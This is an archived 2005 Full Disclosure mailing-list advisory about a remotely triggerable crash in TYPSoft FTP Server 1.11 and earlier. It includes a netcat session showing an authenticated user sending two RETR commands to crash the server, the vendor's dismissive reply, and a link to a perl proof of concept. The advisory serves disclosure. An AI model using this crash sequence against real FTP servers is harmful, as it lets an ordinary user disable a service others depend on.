Full Disclosure mailing list archives
TYPSoft ftpd
From: "Morning Wood" <se_cur_ity () hotmail com>
Date: Thu, 13 Oct 2005 13:15:45 -0700
EXPL-A-2005-016 exploitlabs.com Advisory 045 AFFECTED PRODUCTS TYPSoft FTP Server v1.11 and earlier http://www.typsoft.com/ OVERVIEW TYPSoft FTP Server is a fast and easy ftp server with support to Standard FTP Command, Clean interface, Virtual File System architecture, ability to resume Download and Upload, IP Restriction, Login/Quit message, logs, Multi Language and many other things. DETAILS 1. DOS Typsoft ftp server does not properly support the RETR command. When "Sub Directory Include" is checked in the user config. This is exploitable by authenticated users to TYPSoft ftpd. POC 1. by requesting 2 RETR [string] commands in succession C:\>nc -v 192.168.0.2 21 ftpserv [192.168.0.2] 21 (ftp) open 220 TYPSoft FTP Server 1.11 ready... USER ok 331 Password required for ok. PASS ok 230 User ok logged in. RETR 0 150 Opening data connection for 0. RETR 0 150 Opening data connection for 0. [ crash here ] C:\> Exception ESocketException in module ftpserv.exe at 000862A6 "no port specified" note: string length has no effect and does not appear exploitable. SOLUTION: vendor contact: Oct 10, 2005 webmaster () typsoft com response: --------- Well i dont see any security problem except that TFS will raise an error because the socket was not open on the second RETR It's more a bug that a security problem except if you show me the opposite. Marc TYPSoft reply: ------ see attatched perl POC http://www.exploitlabs.com/files/advisories/typsoft-poc.zip it demonstrates a full crash ( program exit ) from remote. note: a remote DOS[crash] is classified as a security issue, even if it does not lead to compromise, due to the fact that a remote user ( not administrative ) can disable[crash] a (needed) service. response: --------- [none] CREDITS This vulnerability was discovered and researched by Donnie Werner of exploitlabs mail: wood at exploitlabs.com mail: morning_wood at zone-h.org -- web: http://exploitlabs.com web: http://zone-h.org http://www.exploitlabs.com/files/advisories/EXPL-A-2005-016-typsoft-ftpd.txt _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- TYPSoft ftpd Morning Wood (Oct 13)